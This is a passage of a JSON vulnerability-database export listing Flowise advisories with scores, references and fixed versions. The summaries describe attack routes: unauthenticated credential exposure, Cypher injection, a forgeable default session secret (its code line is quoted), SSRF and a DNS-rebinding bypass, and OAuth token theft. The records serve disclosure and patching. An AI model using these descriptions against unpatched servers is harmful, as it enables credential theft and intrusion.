                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
                    "reference_id": "flowise%403.0.13",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x",
                    "reference_id": "GHSA-mq4r-h2gh-qv7x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x",
                    "reference_id": "GHSA-mq4r-h2gh-qv7x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-30822",
                "GHSA-mq4r-h2gh-qv7x"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-affy-v76q-fub6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80643?format=api",
            "vulnerability_id": "VCID-aqg8-6us7-uqef",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the /api/v1/public-chatbotConfig/:id endpoint exposes sensitive data, including API keys, HTTP authorization headers and internal configuration, without any authentication. An attacker who knows only a chatflow UUID can retrieve credentials stored in password-type fields and HTTP headers, leading to credential theft and more. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41266",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00107",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28509",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41266"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41266",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41266"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4jpm-cgx2-8h37",
                    "reference_id": "GHSA-4jpm-cgx2-8h37",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4jpm-cgx2-8h37"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37",
                    "reference_id": "GHSA-4jpm-cgx2-8h37",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:26:39Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41266",
                "GHSA-4jpm-cgx2-8h37"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aqg8-6us7-uqef"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80932?format=api",
            "vulnerability_id": "VCID-b97u-efzx-dffn",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41274",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00232",
                            "scoring_system": "epss",
                            "scoring_elements": "0.46162",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41274"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41274",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41274"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-28g4-38q8-3cwc",
                    "reference_id": "GHSA-28g4-38q8-3cwc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-28g4-38q8-3cwc"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc",
                    "reference_id": "GHSA-28g4-38q8-3cwc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-24T16:20:30Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41274",
                "GHSA-28g4-38q8-3cwc"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b97u-efzx-dffn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359967?format=api",
            "vulnerability_id": "VCID-bkmk-k9mn-ekhx",
            "summary": "Flowise: Weak Default Express Session Secret\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Location | packages/server/src/enterprise/middleware/passport/index.ts:55 |\n| Practical Exploitability | High |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nExpress session secret has a weak default value 'flowise' when EXPRESS_SESSION_SECRET is not set.\n\n### Affected Code\n```\nsecret: process.env.EXPRESS_SESSION_SECRET || 'flowise'\n```\n\n### Evidence\nThe default session secret 'flowise' is publicly visible and weak. Session cookies signed with this secret can be forged by attackers.\n\n### Impact\nSession hijacking and forgery - attackers can create arbitrary session cookies to impersonate any user, bypassing all authentication mechanisms.\n\n### Recommendation\nRequire EXPRESS_SESSION_SECRET to be set with a strong random value. Throw an error on startup if not configured. Use cryptographically strong random strings (minimum 256 bits).\n\n### Notes\nThe Express session secret defaults to the string 'flowise' when EXPRESS_SESSION_SECRET is not set (line 55). This secret is used to sign session cookies via express-session middleware. Since 'flowise' is publicly visible in the source code, an attacker can forge valid session cookies to impersonate any user without authentication. The .env.example file has this commented out (# EXPRESS_SESSION_SECRET=flowise), implying it's optional, which compounds the risk. Unlike development-only defaults, this code path is active in production if the environment variable is not set. The application should require EXPRESS_SESSION_SECRET to be explicitly configured with a cryptographically strong random value and fail to start otherwise.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2qqc-p94c-hxwh",
                    "reference_id": "GHSA-2qqc-p94c-hxwh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2qqc-p94c-hxwh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-2qqc-p94c-hxwh"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bkmk-k9mn-ekhx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359243?format=api",
            "vulnerability_id": "VCID-d4wa-szeh-43ab",
            "summary": "",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41267",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00828",
                            "scoring_system": "epss",
                            "scoring_elements": "0.74961",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41267"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41267",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41267"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-48m6-ch88-55mj",
                    "reference_id": "GHSA-48m6-ch88-55mj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-48m6-ch88-55mj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41267",
                "GHSA-48m6-ch88-55mj"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d4wa-szeh-43ab"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71348?format=api",
            "vulnerability_id": "VCID-dtss-epth-z7fh",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31829",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00103",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27704",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31829"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31829",
                    "reference_id": "CVE-2026-31829",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31829"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fvcw-9w9r-pxc7",
                    "reference_id": "GHSA-fvcw-9w9r-pxc7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fvcw-9w9r-pxc7"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7",
                    "reference_id": "GHSA-fvcw-9w9r-pxc7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-11T14:15:56Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-31829",
                "GHSA-fvcw-9w9r-pxc7"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dtss-epth-z7fh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80899?format=api",
            "vulnerability_id": "VCID-dzed-27rk-3qav",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41273",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.43534",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41273"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41273",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41273"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6f7g-v4pp-r667",
                    "reference_id": "GHSA-6f7g-v4pp-r667",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6f7g-v4pp-r667"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667",
                    "reference_id": "GHSA-6f7g-v4pp-r667",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:33:20Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41273",
                "GHSA-6f7g-v4pp-r667"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dzed-27rk-3qav"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80615?format=api",
            "vulnerability_id": "VCID-e65e-s5sd-kuhp",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41272",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00083",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24258",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41272"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41272",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41272"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2x8m-83vc-6wv4",
                    "reference_id": "GHSA-2x8m-83vc-6wv4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2x8m-83vc-6wv4"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4",
                    "reference_id": "GHSA-2x8m-83vc-6wv4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.1",
